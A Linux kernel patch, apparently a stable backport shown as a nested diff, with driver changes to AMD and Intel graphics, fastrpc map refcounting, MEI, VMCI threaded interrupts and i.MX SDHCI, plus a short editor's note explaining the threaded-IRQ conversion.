++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -325,6 +325,7 @@ soc21_asic_reset_method(struct amdgpu_device *adev)
+ 	case IP_VERSION(13, 0, 10):
+ 		return AMD_RESET_METHOD_MODE1;
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		return AMD_RESET_METHOD_MODE2;
+ 	default:
+ 		if (amdgpu_dpm_is_baco_supported(adev))
+@@ -654,7 +655,23 @@ static int soc21_common_early_init(void *handle)
+ 		adev->external_rev_id = adev->rev_id + 0x20;
+ 		break;
+ 	case IP_VERSION(11, 0, 4):
+-		adev->cg_flags = AMD_CG_SUPPORT_VCN_MGCG |
++		adev->cg_flags =
++			AMD_CG_SUPPORT_GFX_CGCG |
++			AMD_CG_SUPPORT_GFX_CGLS |
++			AMD_CG_SUPPORT_GFX_MGCG |
++			AMD_CG_SUPPORT_GFX_FGCG |
++			AMD_CG_SUPPORT_REPEATER_FGCG |
++			AMD_CG_SUPPORT_GFX_PERF_CLK |
++			AMD_CG_SUPPORT_MC_MGCG |
++			AMD_CG_SUPPORT_MC_LS |
++			AMD_CG_SUPPORT_HDP_MGCG |
++			AMD_CG_SUPPORT_HDP_LS |
++			AMD_CG_SUPPORT_ATHUB_MGCG |
++			AMD_CG_SUPPORT_ATHUB_LS |
++			AMD_CG_SUPPORT_IH_CG |
++			AMD_CG_SUPPORT_BIF_MGCG |
++			AMD_CG_SUPPORT_BIF_LS |
++			AMD_CG_SUPPORT_VCN_MGCG |
+ 			AMD_CG_SUPPORT_JPEG_MGCG;
+ 		adev->pg_flags = AMD_PG_SUPPORT_VCN |
+ 			AMD_PG_SUPPORT_VCN_DPG |
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index dacad8b85963c..e10f1f15c9c43 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1512,8 +1512,6 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		case IP_VERSION(3, 0, 1):
+ 		case IP_VERSION(3, 1, 2):
+ 		case IP_VERSION(3, 1, 3):
+-		case IP_VERSION(3, 1, 4):
+-		case IP_VERSION(3, 1, 5):
+ 		case IP_VERSION(3, 1, 6):
+ 			init_data.flags.gpu_vm_support = true;
+ 			break;
+@@ -5283,8 +5281,6 @@ static void fill_stream_properties_from_drm_display_mode(
+ 
+ 	timing_out->aspect_ratio = get_aspect_ratio(mode_in);
+ 
+-	stream->output_color_space = get_output_color_space(timing_out);
+-
+ 	stream->out_transfer_func->type = TF_TYPE_PREDEFINED;
+ 	stream->out_transfer_func->tf = TRANSFER_FUNCTION_SRGB;
+ 	if (stream->signal == SIGNAL_TYPE_HDMI_TYPE_A) {
+@@ -5295,6 +5291,8 @@ static void fill_stream_properties_from_drm_display_mode(
+ 			adjust_colour_depth_from_display_info(timing_out, info);
+ 		}
+ 	}
++
++	stream->output_color_space = get_output_color_space(timing_out);
+ }
+ 
+ static void fill_audio_info(struct audio_info *audio_info,
+@@ -9433,8 +9431,8 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 			goto fail;
+ 		}
+ 
+-		if (dm_old_con_state->abm_level !=
+-		    dm_new_con_state->abm_level)
++		if (dm_old_con_state->abm_level != dm_new_con_state->abm_level ||
++		    dm_old_con_state->scaling != dm_new_con_state->scaling)
+ 			new_crtc_state->connectors_changed = true;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c
+index 7c2e3b8dc26ad..95562efad6515 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c
+@@ -90,8 +90,8 @@ static const struct out_csc_color_matrix_type output_csc_matrix[] = {
+ 		{ 0xE00, 0xF349, 0xFEB7, 0x1000, 0x6CE, 0x16E3,
+ 				0x24F, 0x200, 0xFCCB, 0xF535, 0xE00, 0x1000} },
+ 	{ COLOR_SPACE_YCBCR2020_TYPE,
+-		{ 0x1000, 0xF149, 0xFEB7, 0x0000, 0x0868, 0x15B2,
+-				0x01E6, 0x0000, 0xFB88, 0xF478, 0x1000, 0x0000} },
++		{ 0x1000, 0xF149, 0xFEB7, 0x1004, 0x0868, 0x15B2,
++				0x01E6, 0x201, 0xFB88, 0xF478, 0x1000, 0x1004} },
+ 	{ COLOR_SPACE_YCBCR709_BLACK_TYPE,
+ 		{ 0x0000, 0x0000, 0x0000, 0x1000, 0x0000, 0x0000,
+ 				0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x1000} },
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index b880f4d7d67e6..2875f6bc3a6a2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -585,6 +585,7 @@ static int smu_set_funcs(struct amdgpu_device *adev)
+ 		yellow_carp_set_ppt_funcs(smu);
+ 		break;
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		smu_v13_0_4_set_ppt_funcs(smu);
+ 		break;
+ 	case IP_VERSION(13, 0, 5):
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+index 85e22210963fc..5cdc07165480b 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+@@ -1171,6 +1171,7 @@ static int renoir_get_smu_metrics_data(struct smu_context *smu,
+ 	int ret = 0;
+ 	uint32_t apu_percent = 0;
+ 	uint32_t dgpu_percent = 0;
++	struct amdgpu_device *adev = smu->adev;
+ 
+ 
+ 	ret = smu_cmn_get_metrics_table(smu,
+@@ -1196,7 +1197,11 @@ static int renoir_get_smu_metrics_data(struct smu_context *smu,
+ 		*value = metrics->AverageUvdActivity / 100;
+ 		break;
+ 	case METRICS_AVERAGE_SOCKETPOWER:
+-		*value = (metrics->CurrentSocketPower << 8) / 1000;
++		if (((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(12, 0, 1)) && (adev->pm.fw_version >= 0x40000f)) ||
++		((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(12, 0, 0)) && (adev->pm.fw_version >= 0x373200)))
++			*value = metrics->CurrentSocketPower << 8;
++		else
++			*value = (metrics->CurrentSocketPower << 8) / 1000;
+ 		break;
+ 	case METRICS_TEMPERATURE_EDGE:
+ 		*value = (metrics->GfxTemperature / 100) *
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 9f9f64c5cdd88..479cbf05c3310 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -250,6 +250,7 @@ int smu_v13_0_check_fw_status(struct smu_context *smu)
+ 
+ 	switch (adev->ip_versions[MP1_HWIP][0]) {
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		mp1_fw_flags = RREG32_PCIE(MP1_Public |
+ 					   (smnMP1_V13_0_4_FIRMWARE_FLAGS & 0xffffffff));
+ 		break;
+@@ -303,6 +304,7 @@ int smu_v13_0_check_fw_version(struct smu_context *smu)
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_YELLOW_CARP;
+ 		break;
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_SMU_V13_0_4;
+ 		break;
+ 	case IP_VERSION(13, 0, 5):
+@@ -843,6 +845,7 @@ int smu_v13_0_gfx_off_control(struct smu_context *smu, bool enable)
+ 	case IP_VERSION(13, 0, 7):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		if (!(adev->pm.pp_feature & PP_GFXOFF_MASK))
+ 			return 0;
+ 		if (enable)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 97e1d55dcaad5..8fa9a36c38b64 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -1026,6 +1026,15 @@ static const struct pptable_funcs smu_v13_0_4_ppt_funcs = {
+ 	.set_gfx_power_up_by_imu = smu_v13_0_set_gfx_power_up_by_imu,
+ };
+ 
++static void smu_v13_0_4_set_smu_mailbox_registers(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	smu->param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_82);
++	smu->msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_66);
++	smu->resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_90);
++}
++
+ void smu_v13_0_4_set_ppt_funcs(struct smu_context *smu)
+ {
+ 	struct amdgpu_device *adev = smu->adev;
+@@ -1035,7 +1044,9 @@ void smu_v13_0_4_set_ppt_funcs(struct smu_context *smu)
+ 	smu->feature_map = smu_v13_0_4_feature_mask_map;
+ 	smu->table_map = smu_v13_0_4_table_map;
+ 	smu->is_apu = true;
+-	smu->param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_82);
+-	smu->msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_66);
+-	smu->resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_90);
++
++	if (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 4))
++		smu_v13_0_4_set_smu_mailbox_registers(smu);
++	else
++		smu_v13_0_set_smu_mailbox_registers(smu);
+ }
+diff --git a/drivers/gpu/drm/i915/display/skl_universal_plane.c b/drivers/gpu/drm/i915/display/skl_universal_plane.c
+index 7cb7130434089..bc523a3d1d42f 100644
+--- a/drivers/gpu/drm/i915/display/skl_universal_plane.c
++++ b/drivers/gpu/drm/i915/display/skl_universal_plane.c
+@@ -1620,7 +1620,7 @@ static int skl_check_main_surface(struct intel_plane_state *plane_state)
+ 	u32 offset;
+ 	int ret;
+ 
+-	if (w > max_width || w < min_width || h > max_height) {
++	if (w > max_width || w < min_width || h > max_height || h < 1) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "requested Y/RGB source size %dx%d outside limits (min: %dx1 max: %dx%d)\n",
+ 			    w, h, min_width, max_width, max_height);
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index 2ce30cff461a0..35bc2a3fa811c 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -1070,12 +1070,9 @@ static int i915_driver_open(struct drm_device *dev, struct drm_file *file)
+  */
+ static void i915_driver_lastclose(struct drm_device *dev)
+ {
+-	struct drm_i915_private *i915 = to_i915(dev);
+-
+ 	intel_fbdev_restore_mode(dev);
+ 
+-	if (HAS_DISPLAY(i915))
+-		vga_switcheroo_process_delayed_switch();
++	vga_switcheroo_process_delayed_switch();
+ }
+ 
+ static void i915_driver_postclose(struct drm_device *dev, struct drm_file *file)
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index cd4487a1d3be0..34f2d9da201e2 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -423,7 +423,8 @@ static const struct intel_device_info ilk_m_info = {
+ 	.has_coherent_ggtt = true, \
+ 	.has_llc = 1, \
+ 	.has_rc6 = 1, \
+-	.has_rc6p = 1, \
++	/* snb does support rc6p, but enabling it causes various issues */ \
++	.has_rc6p = 0, \
+ 	.has_rps = true, \
+ 	.dma_mask_size = 40, \
+ 	.__runtime.ppgtt_type = INTEL_PPGTT_ALIASING, \
+diff --git a/drivers/gpu/drm/i915/i915_switcheroo.c b/drivers/gpu/drm/i915/i915_switcheroo.c
+index 23777d500cdf9..f45bd6b6cede4 100644
+--- a/drivers/gpu/drm/i915/i915_switcheroo.c
++++ b/drivers/gpu/drm/i915/i915_switcheroo.c
+@@ -19,6 +19,10 @@ static void i915_switcheroo_set_state(struct pci_dev *pdev,
+ 		dev_err(&pdev->dev, "DRM not initialized, aborting switch.\n");
+ 		return;
+ 	}
++	if (!HAS_DISPLAY(i915)) {
++		dev_err(&pdev->dev, "Device state not initialized, aborting switch.\n");
++		return;
++	}
+ 
+ 	if (state == VGA_SWITCHEROO_ON) {
+ 		drm_info(&i915->drm, "switched on\n");
+@@ -44,7 +48,7 @@ static bool i915_switcheroo_can_switch(struct pci_dev *pdev)
+ 	 * locking inversion with the driver load path. And the access here is
+ 	 * completely racy anyway. So don't bother with locking for now.
+ 	 */
+-	return i915 && atomic_read(&i915->drm.open_count) == 0;
++	return i915 && HAS_DISPLAY(i915) && atomic_read(&i915->drm.open_count) == 0;
+ }
+ 
+ static const struct vga_switcheroo_client_ops i915_switcheroo_ops = {
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.h b/drivers/infiniband/ulp/srp/ib_srp.h
+index 00b0068fda208..5d94db453df32 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.h
++++ b/drivers/infiniband/ulp/srp/ib_srp.h
+@@ -62,9 +62,6 @@ enum {
+ 	SRP_DEFAULT_CMD_SQ_SIZE = SRP_DEFAULT_QUEUE_SIZE - SRP_RSP_SQ_SIZE -
+ 				  SRP_TSK_MGMT_SQ_SIZE,
+ 
+-	SRP_TAG_NO_REQ		= ~0U,
+-	SRP_TAG_TSK_MGMT	= 1U << 31,
+-
+ 	SRP_MAX_PAGES_PER_MR	= 512,
+ 
+ 	SRP_MAX_ADD_CDB_LEN	= 16,
+@@ -79,6 +76,11 @@ enum {
+ 				  sizeof(struct srp_imm_buf),
+ };
+ 
++enum {
++	SRP_TAG_NO_REQ		= ~0U,
++	SRP_TAG_TSK_MGMT	= BIT(31),
++};
++
+ enum srp_target_state {
+ 	SRP_TARGET_SCANNING,
+ 	SRP_TARGET_LIVE,
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 7ff0b63c25e37..80811e852d8fd 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -316,6 +316,13 @@ static void fastrpc_free_map(struct kref *ref)
+ 		dma_buf_put(map->buf);
+ 	}
+ 
++	if (map->fl) {
++		spin_lock(&map->fl->lock);
++		list_del(&map->node);
++		spin_unlock(&map->fl->lock);
++		map->fl = NULL;
++	}
++
+ 	kfree(map);
+ }
+ 
+@@ -325,38 +332,41 @@ static void fastrpc_map_put(struct fastrpc_map *map)
+ 		kref_put(&map->refcount, fastrpc_free_map);
+ }
+ 
+-static void fastrpc_map_get(struct fastrpc_map *map)
++static int fastrpc_map_get(struct fastrpc_map *map)
+ {
+-	if (map)
+-		kref_get(&map->refcount);
++	if (!map)
++		return -ENOENT;
++
++	return kref_get_unless_zero(&map->refcount) ? 0 : -ENOENT;
+ }
+ 
+ 
+ static int fastrpc_map_lookup(struct fastrpc_user *fl, int fd,
+-			    struct fastrpc_map **ppmap)
++			    struct fastrpc_map **ppmap, bool take_ref)
+ {
++	struct fastrpc_session_ctx *sess = fl->sctx;
+ 	struct fastrpc_map *map = NULL;
++	int ret = -ENOENT;
+ 
+-	mutex_lock(&fl->mutex);
++	spin_lock(&fl->lock);
+ 	list_for_each_entry(map, &fl->maps, node) {
+-		if (map->fd == fd) {
+-			*ppmap = map;
+-			mutex_unlock(&fl->mutex);
+-			return 0;
+-		}
+-	}
+-	mutex_unlock(&fl->mutex);
+-
+-	return -ENOENT;
+-}
++		if (map->fd != fd)
++			continue;
+ 
+-static int fastrpc_map_find(struct fastrpc_user *fl, int fd,
+-			    struct fastrpc_map **ppmap)
+-{
+-	int ret = fastrpc_map_lookup(fl, fd, ppmap);
++		if (take_ref) {
++			ret = fastrpc_map_get(map);
++			if (ret) {
++				dev_dbg(sess->dev, "%s: Failed to get map fd=%d ret=%d\n",
++					__func__, fd, ret);
++				break;
++			}
++		}
+ 
+-	if (!ret)
+-		fastrpc_map_get(*ppmap);
++		*ppmap = map;
++		ret = 0;
++		break;
++	}
++	spin_unlock(&fl->lock);
+ 
+ 	return ret;
+ }
+@@ -703,7 +713,7 @@ static int fastrpc_map_create(struct fastrpc_user *fl, int fd,
+ 	struct fastrpc_map *map = NULL;
+ 	int err = 0;
+ 
+-	if (!fastrpc_map_find(fl, fd, ppmap))
++	if (!fastrpc_map_lookup(fl, fd, ppmap, true))
+ 		return 0;
+ 
+ 	map = kzalloc(sizeof(*map), GFP_KERNEL);
+@@ -1026,7 +1036,7 @@ static int fastrpc_put_args(struct fastrpc_invoke_ctx *ctx,
+ 	for (i = 0; i < FASTRPC_MAX_FDLIST; i++) {
+ 		if (!fdlist[i])
+ 			break;
+-		if (!fastrpc_map_lookup(fl, (int)fdlist[i], &mmap))
++		if (!fastrpc_map_lookup(fl, (int)fdlist[i], &mmap, false))
+ 			fastrpc_map_put(mmap);
+ 	}
+ 
+@@ -1265,12 +1275,7 @@ err_invoke:
+ 	fl->init_mem = NULL;
+ 	fastrpc_buf_free(imem);
+ err_alloc:
+-	if (map) {
+-		spin_lock(&fl->lock);
+-		list_del(&map->node);
+-		spin_unlock(&fl->lock);
+-		fastrpc_map_put(map);
+-	}
++	fastrpc_map_put(map);
+ err:
+ 	kfree(args);
+ 
+@@ -1346,10 +1351,8 @@ static int fastrpc_device_release(struct inode *inode, struct file *file)
+ 		fastrpc_context_put(ctx);
+ 	}
+ 
+-	list_for_each_entry_safe(map, m, &fl->maps, node) {
+-		list_del(&map->node);
++	list_for_each_entry_safe(map, m, &fl->maps, node)
+ 		fastrpc_map_put(map);
+-	}
+ 
+ 	list_for_each_entry_safe(buf, b, &fl->mmaps, node) {
+ 		list_del(&buf->node);
+diff --git a/drivers/misc/mei/bus.c b/drivers/misc/mei/bus.c
+index 46aa3554e97b0..7b7f4190cd023 100644
+--- a/drivers/misc/mei/bus.c
++++ b/drivers/misc/mei/bus.c
+@@ -665,13 +665,15 @@ void *mei_cldev_dma_map(struct mei_cl_device *cldev, u8 buffer_id, size_t size)
+ 	if (cl->state == MEI_FILE_UNINITIALIZED) {
+ 		ret = mei_cl_link(cl);
+ 		if (ret)
+-			goto out;
++			goto notlinked;
+ 		/* update pointers */
+ 		cl->cldev = cldev;
+ 	}
+ 
+ 	ret = mei_cl_dma_alloc_and_map(cl, NULL, buffer_id, size);
+-out:
++	if (ret)
++		mei_cl_unlink(cl);
++notlinked:
+ 	mutex_unlock(&bus->device_lock);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+@@ -721,7 +723,7 @@ int mei_cldev_enable(struct mei_cl_device *cldev)
+ 	if (cl->state == MEI_FILE_UNINITIALIZED) {
+ 		ret = mei_cl_link(cl);
+ 		if (ret)
+-			goto out;
++			goto notlinked;
+ 		/* update pointers */
+ 		cl->cldev = cldev;
+ 	}
+@@ -748,6 +750,9 @@ int mei_cldev_enable(struct mei_cl_device *cldev)
+ 	}
+ 
+ out:
++	if (ret)
++		mei_cl_unlink(cl);
++notlinked:
+ 	mutex_unlock(&bus->device_lock);
+ 
+ 	return ret;
+@@ -1115,7 +1120,6 @@ static void mei_cl_bus_dev_release(struct device *dev)
+ 	mei_cl_flush_queues(cldev->cl, NULL);
+ 	mei_me_cl_put(cldev->me_cl);
+ 	mei_dev_bus_put(cldev->bus);
+-	mei_cl_unlink(cldev->cl);
+ 	kfree(cldev->cl);
+ 	kfree(cldev);
+ }
+diff --git a/drivers/misc/mei/hw-me-regs.h b/drivers/misc/mei/hw-me-regs.h
+index 99966cd3e7d89..bdc65d50b945f 100644
+--- a/drivers/misc/mei/hw-me-regs.h
++++ b/drivers/misc/mei/hw-me-regs.h
+@@ -111,6 +111,8 @@
+ 
+ #define MEI_DEV_ID_RPL_S      0x7A68  /* Raptor Lake Point S */
+ 
++#define MEI_DEV_ID_MTL_M      0x7E70  /* Meteor Lake Point M */
++
+ /*
+  * MEI HW Section
+  */
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index 704cd0caa172c..5bf0d50d55a00 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -118,6 +118,8 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_CFG)},
+ 
++	{MEI_PCI_DEVICE(MEI_DEV_ID_MTL_M, MEI_ME_PCH15_CFG)},
++
+ 	/* required last entry */
+ 	{0, }
+ };
+diff --git a/drivers/misc/vmw_vmci/vmci_guest.c b/drivers/misc/vmw_vmci/vmci_guest.c
+index aa7b05de97dd5..4f8d962bb5b2a 100644
+--- a/drivers/misc/vmw_vmci/vmci_guest.c
++++ b/drivers/misc/vmw_vmci/vmci_guest.c
+@@ -56,8 +56,6 @@ struct vmci_guest_device {
+ 
+ 	bool exclusive_vectors;
+ 
+-	struct tasklet_struct datagram_tasklet;
+-	struct tasklet_struct bm_tasklet;
+ 	struct wait_queue_head inout_wq;
+ 
+ 	void *data_buffer;
+@@ -304,9 +302,8 @@ static int vmci_check_host_caps(struct pci_dev *pdev)
+  * This function assumes that it has exclusive access to the data
+  * in register(s) for the duration of the call.
+  */
+-static void vmci_dispatch_dgs(unsigned long data)
++static void vmci_dispatch_dgs(struct vmci_guest_device *vmci_dev)
+ {
+-	struct vmci_guest_device *vmci_dev = (struct vmci_guest_device *)data;
+ 	u8 *dg_in_buffer = vmci_dev->data_buffer;
+ 	struct vmci_datagram *dg;
+ 	size_t dg_in_buffer_size = VMCI_MAX_DG_SIZE;
+@@ -465,10 +462,8 @@ static void vmci_dispatch_dgs(unsigned long data)
+  * Scans the notification bitmap for raised flags, clears them
+  * and handles the notifications.
+  */
+-static void vmci_process_bitmap(unsigned long data)
++static void vmci_process_bitmap(struct vmci_guest_device *dev)
+ {
+-	struct vmci_guest_device *dev = (struct vmci_guest_device *)data;
+-
+ 	if (!dev->notification_bitmap) {
+ 		dev_dbg(dev->dev, "No bitmap present in %s\n", __func__);
+ 		return;
+@@ -486,13 +481,13 @@ static irqreturn_t vmci_interrupt(int irq, void *_dev)
+ 	struct vmci_guest_device *dev = _dev;
+ 
+ 	/*
+-	 * If we are using MSI-X with exclusive vectors then we simply schedule
+-	 * the datagram tasklet, since we know the interrupt was meant for us.
++	 * If we are using MSI-X with exclusive vectors then we simply call
++	 * vmci_dispatch_dgs(), since we know the interrupt was meant for us.
+ 	 * Otherwise we must read the ICR to determine what to do.
+ 	 */
+ 
+ 	if (dev->exclusive_vectors) {
+-		tasklet_schedule(&dev->datagram_tasklet);
++		vmci_dispatch_dgs(dev);
+ 	} else {
+ 		unsigned int icr;
+ 
+@@ -502,12 +497,12 @@ static irqreturn_t vmci_interrupt(int irq, void *_dev)
+ 			return IRQ_NONE;
+ 
+ 		if (icr & VMCI_ICR_DATAGRAM) {
+-			tasklet_schedule(&dev->datagram_tasklet);
++			vmci_dispatch_dgs(dev);
+ 			icr &= ~VMCI_ICR_DATAGRAM;
+ 		}
+ 
+ 		if (icr & VMCI_ICR_NOTIFICATION) {
+-			tasklet_schedule(&dev->bm_tasklet);
++			vmci_process_bitmap(dev);
+ 			icr &= ~VMCI_ICR_NOTIFICATION;
+ 		}
+ 
+@@ -536,7 +531,7 @@ static irqreturn_t vmci_interrupt_bm(int irq, void *_dev)
+ 	struct vmci_guest_device *dev = _dev;
+ 
+ 	/* For MSI-X we can just assume it was meant for us. */
+-	tasklet_schedule(&dev->bm_tasklet);
++	vmci_process_bitmap(dev);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -638,10 +633,6 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	vmci_dev->iobase = iobase;
+ 	vmci_dev->mmio_base = mmio_base;
+ 
+-	tasklet_init(&vmci_dev->datagram_tasklet,
+-		     vmci_dispatch_dgs, (unsigned long)vmci_dev);
+-	tasklet_init(&vmci_dev->bm_tasklet,
+-		     vmci_process_bitmap, (unsigned long)vmci_dev);
+ 	init_waitqueue_head(&vmci_dev->inout_wq);
+ 
+ 	if (mmio_base != NULL) {
+@@ -808,8 +799,9 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	 * Request IRQ for legacy or MSI interrupts, or for first
+ 	 * MSI-X vector.
+ 	 */
+-	error = request_irq(pci_irq_vector(pdev, 0), vmci_interrupt,
+-			    IRQF_SHARED, KBUILD_MODNAME, vmci_dev);
++	error = request_threaded_irq(pci_irq_vector(pdev, 0), NULL,
++				     vmci_interrupt, IRQF_SHARED,
++				     KBUILD_MODNAME, vmci_dev);
+ 	if (error) {
+ 		dev_err(&pdev->dev, "Irq %u in use: %d\n",
+ 			pci_irq_vector(pdev, 0), error);
+@@ -823,9 +815,9 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	 * between the vectors.
+ 	 */
+ 	if (vmci_dev->exclusive_vectors) {
+-		error = request_irq(pci_irq_vector(pdev, 1),
+-				    vmci_interrupt_bm, 0, KBUILD_MODNAME,
+-				    vmci_dev);
++		error = request_threaded_irq(pci_irq_vector(pdev, 1), NULL,
++					     vmci_interrupt_bm, 0,
++					     KBUILD_MODNAME, vmci_dev);
+ 		if (error) {
+ 			dev_err(&pdev->dev,
+ 				"Failed to allocate irq %u: %d\n",
+@@ -833,9 +825,11 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 			goto err_free_irq;
+ 		}
+ 		if (caps_in_use & VMCI_CAPS_DMA_DATAGRAM) {
+-			error = request_irq(pci_irq_vector(pdev, 2),
+-					    vmci_interrupt_dma_datagram,
+-					    0, KBUILD_MODNAME, vmci_dev);
++			error = request_threaded_irq(pci_irq_vector(pdev, 2),
++						     NULL,
++						    vmci_interrupt_dma_datagram,
++						     0, KBUILD_MODNAME,
++						     vmci_dev);
+ 			if (error) {
+ 				dev_err(&pdev->dev,
+ 					"Failed to allocate irq %u: %d\n",
+@@ -871,8 +865,6 @@ err_free_bm_irq:
+ 
+ err_free_irq:
+ 	free_irq(pci_irq_vector(pdev, 0), vmci_dev);
+-	tasklet_kill(&vmci_dev->datagram_tasklet);
+-	tasklet_kill(&vmci_dev->bm_tasklet);
+ 
+ err_disable_msi:
+ 	pci_free_irq_vectors(pdev);
+@@ -943,9 +935,6 @@ static void vmci_guest_remove_device(struct pci_dev *pdev)
+ 	free_irq(pci_irq_vector(pdev, 0), vmci_dev);
+ 	pci_free_irq_vectors(pdev);
+ 
+-	tasklet_kill(&vmci_dev->datagram_tasklet);
+-	tasklet_kill(&vmci_dev->bm_tasklet);
+-
+ 	if (vmci_dev->notification_bitmap) {
+ 		/*
+ 		 * The device reset above cleared the bitmap state of the
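
[Editor's note] The VMCI hunks above replace both tasklets with direct calls from threaded interrupt handlers: request_threaded_irq() with a NULL primary handler lets the IRQ core wake a sleepable thread that runs the former tasklet body. Below is a minimal sketch of that conversion pattern, assuming kernel context; the foo_* names are illustrative, not from the patch.

#include <linux/interrupt.h>

struct foo_dev {
	void __iomem *regs;
};

/* Former tasklet body, now running in sleepable thread context. */
static irqreturn_t foo_irq_thread(int irq, void *data)
{
	struct foo_dev *fd = data;

	/* ... drain datagrams / scan the notification bitmap ... */
	(void)fd;
	return IRQ_HANDLED;
}

static int foo_setup_irq(struct foo_dev *fd, int irq)
{
	/*
	 * NULL primary handler: the core installs a default hard-IRQ
	 * handler that just wakes foo_irq_thread(). IRQF_ONESHOT keeps
	 * the line masked until the thread finishes; the sketch uses it
	 * as the conservative choice for level-triggered lines.
	 */
	return request_threaded_irq(irq, NULL, foo_irq_thread,
				    IRQF_ONESHOT, "foo", fd);
}
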
+diff --git a/drivers/mmc/host/sdhci-esdhc-imx.c b/drivers/mmc/host/sdhci-esdhc-imx.c
+index ffeb5759830ff..8c62c3fba75e8 100644
+--- a/drivers/mmc/host/sdhci-esdhc-imx.c
++++ b/drivers/mmc/host/sdhci-esdhc-imx.c
+@@ -107,6 +107,7 @@
+ #define ESDHC_TUNING_START_TAP_DEFAULT	0x1
+ #define ESDHC_TUNING_START_TAP_MASK	0x7f
+ #define ESDHC_TUNING_CMD_CRC_CHECK_DISABLE	(1 << 7)
++#define ESDHC_TUNING_STEP_DEFAULT	0x1
+ #define ESDHC_TUNING_STEP_MASK		0x00070000
+ #define ESDHC_TUNING_STEP_SHIFT		16
+ 
+@@ -1361,7 +1362,7 @@ static void sdhci_esdhc_imx_hwinit(struct sdhci_host *host)
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct pltfm_imx_data *imx_data = sdhci_pltfm_priv(pltfm_host);
+ 	struct cqhci_host *cq_host = host->mmc->cqe_private;
+-	int tmp;
++	u32 tmp;
+ 
+ 	if (esdhc_is_usdhc(imx_data)) {
+ 		/*
